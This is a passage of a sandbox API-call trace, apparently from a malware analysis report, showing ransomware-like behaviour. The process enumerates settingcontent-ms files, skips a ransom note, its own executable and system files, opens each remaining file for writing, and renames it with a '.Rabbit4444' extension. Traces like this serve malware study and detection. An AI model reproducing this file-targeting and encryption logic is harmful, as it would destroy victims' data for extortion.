-1 [0058.761] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.761] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms" | out: lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms") returned="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms" [0058.761] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.761] lstrlenW (lpString="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms") returned 64 [0058.761] lstrlenW (lpString="Rabbit4444") returned 10 [0058.761] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.761] lstrlenW (lpString=".dll") returned 4 [0058.761] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.761] lstrlenW (lpString=".lnk") returned 4 [0058.761] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.761] lstrlenW (lpString=".ini") returned 4 [0058.761] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.761] lstrlenW (lpString=".sys") returned 4 [0058.761] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.761] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{60c811e8-c857-404e-98bb-ee5d83c1df5a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.762] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.762] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15007234803) returned 1 [0058.762] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1025) returned 1 [0058.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0058.762] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0058.763] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0058.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.764] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15007483676) returned 1 [0058.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0058.764] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.764] CloseHandle (hObject=0x298) returned 1 [0058.764] CloseHandle (hObject=0x278) returned 1 [0058.764] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms.Rabbit4444") returned 192 [0058.764] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{60c811e8-c857-404e-98bb-ee5d83c1df5a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{60c811e8-c857-404e-98bb-ee5d83c1df5a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.765] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3c6582, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4f3c6582, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", cAlternateFileName="CLA744~1.SET")) returned 1 [0058.765] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.765] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.765] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2=".") returned 1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="..") returned 1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="windows") returned -1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="boot") returned 1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.766] lstrcmpiW (lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.766] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms" | out: lpString1="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms") returned="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms" [0058.766] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.766] lstrlenW (lpString="Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms") returned 64 [0058.766] lstrlenW (lpString="Rabbit4444") returned 10 [0058.766] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.766] lstrlenW (lpString=".dll") returned 4 [0058.766] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.766] lstrlenW (lpString=".lnk") returned 4 [0058.766] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.766] lstrlenW (lpString=".ini") returned 4 [0058.766] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.766] lstrlenW (lpString=".sys") returned 4 [0058.766] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.767] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.767] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15007756307) returned 1 [0058.767] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=829) returned 1 [0058.767] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0058.768] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0058.824] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0058.830] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.830] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.830] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.835] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15014625462) returned 1 [0058.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0058.836] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.836] CloseHandle (hObject=0x298) returned 1 [0058.836] CloseHandle (hObject=0x278) returned 1 [0058.836] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms.Rabbit4444") returned 192 [0058.836] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.838] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f51dab5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4f51dab5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", cAlternateFileName="CL0AAF~1.SET")) returned 1 [0058.838] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.839] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.839] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.839] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2=".") returned 1 [0058.840] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="..") returned 1 [0058.840] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="windows") returned -1 [0058.840] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.840] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.840] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="boot") returned 1 [0058.840] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.840] lstrcmpiW (lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.840] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms" | out: lpString1="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms") returned="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms" [0058.840] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.842] lstrlenW (lpString="Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms") returned 64 [0058.842] lstrlenW (lpString="Rabbit4444") returned 10 [0058.843] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.843] lstrlenW (lpString=".dll") returned 4 [0058.843] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.844] lstrlenW (lpString=".lnk") returned 4 [0058.844] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.844] lstrlenW (lpString=".ini") returned 4 [0058.844] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.844] lstrlenW (lpString=".sys") returned 4 [0058.845] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.845] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.847] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.848] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15015829770) returned 1 [0058.848] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1019) returned 1 [0058.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0058.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.849] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.852] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.856] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.859] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15017150676) returned 1 [0058.862] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0058.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.863] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.864] CloseHandle (hObject=0x298) returned 1 [0058.864] CloseHandle (hObject=0x278) returned 1 [0058.865] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms.Rabbit4444") returned 192 [0058.865] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.870] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd75e93, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4fd75e93, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", cAlternateFileName="CL53B7~1.SET")) returned 1 [0058.871] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.871] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.871] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.872] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2=".") returned 1 [0058.872] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="..") returned 1 [0058.872] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="windows") returned -1 [0058.872] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.872] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.873] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="boot") returned 1 [0058.873] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.873] lstrcmpiW (lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.874] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms" | out: lpString1="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms") returned="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms" [0058.874] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.876] lstrlenW (lpString="Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms") returned 64 [0058.877] lstrlenW (lpString="Rabbit4444") returned 10 [0058.877] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.877] lstrlenW (lpString=".dll") returned 4 [0058.877] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.878] lstrlenW (lpString=".lnk") returned 4 [0058.878] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.878] lstrlenW (lpString=".ini") returned 4 [0058.878] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.879] lstrlenW (lpString=".sys") returned 4 [0058.879] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{63929d0b-aaac-4dca-ae8a-222ec37f7a88}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.880] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.880] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15019106158) returned 1 [0058.880] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1057) returned 1 [0058.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0058.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0058.881] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0058.882] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0058.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | 